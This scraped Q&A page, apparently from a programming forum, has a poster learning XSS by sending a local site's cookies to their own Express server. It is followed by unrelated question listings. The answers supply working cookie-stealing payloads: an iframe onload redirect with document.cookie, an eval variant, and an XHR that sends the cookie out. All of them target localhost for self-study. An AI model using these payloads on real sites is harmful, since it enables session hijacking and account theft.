What could be the reason for this XSS script not making a request to my server?

Currently diving into the realm of XSS attacks to enhance my knowledge on application security. My goal is to extract the user's cookie from a local website and then transmit it to my local server for testing purposes.

I've successfully obtained the cookie using an alert message, but encountering difficulties when attempting to execute an API call. Here is the code snippet I suspect may be causing the issue:

Code in React app:

<p dangerouslySetInnerHTML={{
      __html: `<script type="text/javascript">
               document.location='http://localhost:2021/xss?user='+document.cookie;
               </script>`,
    }}
    />

Server-side code:

const app = require("express")();
    const cors = require("cors");
    app.use(cors());
    
    app.get("/xss", (req, res) => {
    const {user} = req.query
      res.send("it works", user);
    });
    
    app.listen(2021, () =>
      console.log("Server is waiting to read yummy cookies")
    );

The specified route "/xss" does not seem to trigger any action as expected.

javascriptxss

Answer №1

Manipulating innerHTML will not trigger script execution.

document.getElementById("container").innerHTML=`<script>alert("hi")<\/script>Nothing occurs`
<div id="container"></div>

Consider using this alternative method instead:

<div dangerouslySetInnerHTML={{
  __html: `<iframe onload="document.location='http://localhost:2021/xss?user='+document.cookie;"></iframe>`,
}}
/>

Answer №2

I'm not sure what your goal is, but creating a script tag like that is not the best solution. The issue here is that the JavaScript code isn't being executed because it's being treated as plain text within the script tag. If you want to execute JavaScript from a string, you could use the eval function (although I would advise against it due to security risks). Here's an example of how you could do this:

const script = `document.location='http://localhost:2021/xss?user='+document.cookie;`;
eval(script);

However, I must emphasize again: do not do this!!!

Instead, consider serving the JavaScript file from a server and using the src attribute to load it.

If you simply need to make an HTTP request, you can use XHR. More information on this topic can be found here. In short:

const xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:2021/xss?user=' + document.cookie);
xhr.send();

This approach should work without introducing any security risks.

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

What is the best way to retrieve a variable in AngularJS1 after the HTML has been divided into multiple child HTML files?

I have segmented my main HTML page into multiple subpages and included them in the main file. However, it seems that each subpage is referencing different '$scope' variables. I am trying to reference ng-modle="My-model" from one subpage to anothe ...

javascripthtmlangularjs

Is the Site Header displayed depending on the scroll position and direction of scrolling?

On my website, I have a header that I want to hide when the user scrolls down 100px and show again when they scroll up 50px. I attempted to write a script for this functionality, but it doesn't seem to be working as expected. CSS /* This CSS rule w ...

javascriptjquerycsselementor

Disabling an anchor using the 'disabled' property is proving to be a challenge for me

I'm attempting to dynamically enable or disable an anchor element based on the user's role. So far, I've tried a few different methods: document.getElementById('myBtn').disabled = true; However, this returns an error: The propert ...

javascriptangulartypescript

Expand and enhance your content with the Vue Sidebar Menu plugin

Recently, I integrated a side-bar-menu utilizing . My goal is to have a sidebar menu that pushes its content when it expands. Any suggestions on which props or styles I should incorporate to achieve this effect? Below is my Vue code: <template> ...

javascriptvue.js

What is the process for implementing text box validation on a button click within a gridview in asp.net utilizing javascript?

How can I implement textbox blank validation on button click within a gridview using JavaScript? My gridview has multiple rows with 2 textboxes and a save button in each row. I need to validate the textboxes when their corresponding save button is clicked. ...

c#javascriptasp.netvb.netvalidation

Is the text in the React chat application too lengthy causing a bug problem?

In my chat application built with React, I am facing an issue where if a user types more than 100 characters, the message gets cut off. How can I fix this problem? Please refer to the image below for reference. {Object.keys(messages).map((keyName) => ...

javascripthtmlcssreactjs

A guide to troubleshooting the "Cannot resolve all parameters error" in Angular

Recently delved into the world of angular 2, and I've come across my first challenge. I'm trying to establish a service for retrieving data from a server but I keep encountering this particular error Error: Can't resolve all parameters fo ...

javascriptangular

Sending the value from a for loop through AJAX and populating it into a form field

Currently, I have implemented a piece of JavaScript code that captures user input, sends a request to an endpoint using AJAX, and appends a specific field from the returned results as an option within a datalist. This functionality is working perfectly fin ...

javascripthtmljsonajax

Discrepancy in functionality between .show() and .append() methods within JQuery

I have a container with an ID of "poidiv" that is hidden (display: none) initially. My goal is to dynamically load this container multiple times using a loop, where the maximum value for the loop is not predetermined. I attempted to achieve this using jQue ...

javascriptjqueryajax

Exploring the process of iterating through a JSON post response and displaying its contents within image divs

After receiving a JSON post response, I am looking to iterate over the data and display it in image divs. Can anyone provide guidance on how to achieve this using JavaScript? Thank you. Here is the JavaScript code that handles the JSON post response: cor ...

javascriptjqueryparsingjson

The side menu in Bootstrap dropdown experiences a one-time functionality

When navigating through a responsive top menu with Bootstrap, everything works seamlessly - from toggling the menu to dropdown functionality. However, I encountered an issue with the side menu as nav-pills used to select tab-panes. <div class="containe ...

javascriptjqueryhtmlcsstwitter-bootstrap

The XMLHttpRequest onload() function is failing to pass an instance of the XMLHttpRequest object

I am facing an issue with a function that sends a basic AJAX request to my server. The JavaScript code in the browser is as follows: function testRequest() { var xhr = new XMLHttpRequest(); xhr.onload = () => { console.log("RESPONSE R ...

javascriptajaxexpresshttpxmlhttprequest

Issue with VueJS where the datalist input does not reset the value

I am currently working on a Vue component that scans QR codes and adds information to a database upon successful scanning. The scanning process works perfectly fine. However, after successfully sending the data, I need to clear the input field in my datali ...

javascripthtmlvue.jsvue-componenthtml-datalist

When performing the operation number.tofixed in Typescript, it will always return a string value instead of a double datatype as expected from parseFloat

let value = 100 value.toFixed(2) -> "100.00" parseFloat(value.toFixed(2)) -> 100 I am encountering an unexpected result with the double type when input is 100.36, but not with 100.00. Framework: loopback4 ...

javascripttypescriptloopback4parsefloattofixed

The submission of the Jquery form is not successful

I am struggling with a form on my page. I want to disable the submit button and display a custom message when submitted, then use jQuery to actually submit the form. <form> <input type="text" name="run"/> <input type=&quo ...

javascripthtmljqueryforms

Leveraging Gatsbyjs to Integrate GraphQL Data with Material UI Library

Just starting out as a Frontend Developer and currently learning Gatsbyjs along with the Material UI library. I'm working on creating a new page using the Material UI Gatsby Starter code available here. However, I've encountered an issue when tr ...

javascriptreactjsmaterial-uigatsby

Using JavaScript for Text Processing on Disk

Currently, I have a set of HTML files that require automated processing such as regex replacements and more complex actions like copying specific text blocks from one file to another. I am considering creating a series of scripts to handle this processing ...

javascriptregexnode.js

Animating a div in CSS3 to expand horizontally from left to right without affecting its original position

I am currently in the process of developing a calendar using HTML, CSS, and JavaScript. The main purpose of this calendar is to showcase upcoming and past events. However, I am facing difficulties in ensuring that my event blocks occupy the remaining space ...

javascripthtmlcss

Difficulty arises when Jest tests struggle to interpret basic HTML tags within a React Component

When running test runs, issues arise when using standard HTML tags with Jest. My setup includes Babel, Webpack, Jest, and React Testing Library. To enable jest, I have installed a number of packages: "@babel/plugin-proposal-class-properties": "7.8.3", "@ ...

javascriptreactjswebpackjestjsbabeljs

The curly braces in AngularJS are failing to display the values on the HTML page

After trying various articles and solutions to different questions, I am still unable to resolve my issue. I am working on a blank ionic project and it is running smoothly in my browser using ionic serve without any errors. However, instead of displaying ...

javascripthtmlangularjsionic-framework